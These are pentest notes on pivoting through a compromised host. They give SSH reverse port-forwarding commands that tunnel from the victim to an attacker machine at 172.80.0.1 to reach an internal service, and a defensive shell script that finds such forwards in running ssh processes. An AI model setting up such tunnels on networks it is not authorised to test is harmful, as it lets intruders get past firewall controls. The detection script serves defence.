In the case where we have a shell on 172.65.0.5 but inbound SSH to it is blocked, we can still tunnel: the compromised host opens an outbound SSH connection to the attacker machine (172.80.0.1), and through that connection the attacker reaches a vulnerable service on the target network, e.g. 192.162.1.2 on port 8080.
- Enable ssh on attacker machine
systemctl start ssh
- On the compromised machine (here -R means remote forwarding: the listening port is opened on the remote end of the connection, i.e. on the attacker machine)
ssh -R <attacker-local-port>:<target-ip>:<target-port> <user>@<attacker-ip> -fN
ssh -R 8000:192.162.1.2:8080 <user>@172.80.0.1 -fN
- To check whether the tunnel is up, on the attacker machine (the forward from the example above listens locally on port 8000, not on the target's port 8080)
ss -antp | grep "8000"
sudo nmap -sS -sV 127.0.0.1 -p 8000
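From the defender's side, a reverse forward like the one above is visible in the command line of the ssh client process on the compromised host. The following POSIX sh script is an added example, not part of the original notes: it parses the OpenSSH client's -R/-L/-D options out of a command line and can walk /proc to audit the ssh clients currently running; the sample command lines at the bottom are constructed for the demonstration.

```shell
#!/bin/sh
# Print one line per forwarding option in an ssh client command line:
#   reverse <listen-port> -> <dest-host>:<dest-port>   (-R)
#   local   <listen-port> -> <dest-host>:<dest-port>   (-L)
#   dynamic <listen-port>                              (-D)
# Prints "none" when the command line carries no forward.
# Handles "-R spec" and the fused "-Rspec" form; bracketed IPv6 hosts are not parsed.
describe_ssh_forwards() {
    found=0
    set -- $1                          # split the command line on whitespace
    while [ $# -gt 0 ]; do
        case "$1" in
            -R|-L|-D)     [ $# -ge 2 ] || break; kind=$1; spec=$2; shift 2 ;;
            -R?*|-L?*|-D?*) kind=${1%"${1#??}"}; spec=${1#??}; shift ;;
            *)            shift; continue ;;
        esac
        # spec is [bind_address:]port:host:hostport for -R/-L, [bind_address:]port for -D
        case "$kind" in
            -D) echo "dynamic ${spec##*:}" ;;
            *)
                hostport=${spec##*:}; rest=${spec%:*}
                host=${rest##*:};     rest=${rest%:*}
                port=${rest##*:}       # drops an optional bind address prefix
                [ "$kind" = -R ] && label=reverse || label=local
                echo "$label $port -> $host:$hostport"
                ;;
        esac
        found=1
    done
    [ $found -eq 1 ] || echo none
}

# Walk /proc and report forwards carried by every running ssh client (run as root
# to see other users' processes).
audit_running_ssh_clients() {
    for cmdline in /proc/[0-9]*/cmdline; do
        [ -r "$cmdline" ] || continue
        args=$(tr '\0' ' ' < "$cmdline" 2>/dev/null) || continue
        case "$args" in
            ssh\ *|*/ssh\ *) ;;
            *) continue ;;
        esac
        pid=${cmdline#/proc/}; pid=${pid%/cmdline}
        describe_ssh_forwards "$args" | grep -v '^none$' | sed "s/^/pid $pid: /"
    done
}

# Constructed command lines (not captured from a real host) showing the output format.
describe_ssh_forwards 'ssh -R 8000:192.162.1.2:8080 user@172.80.0.1 -fN'
describe_ssh_forwards 'ssh -fN -R0.0.0.0:8000:192.162.1.2:8080 user@172.80.0.1'
describe_ssh_forwards 'ssh -p 2222 user@172.80.0.1'
```

On a live host, call audit_running_ssh_clients to list every ssh client process together with the forwards it carries.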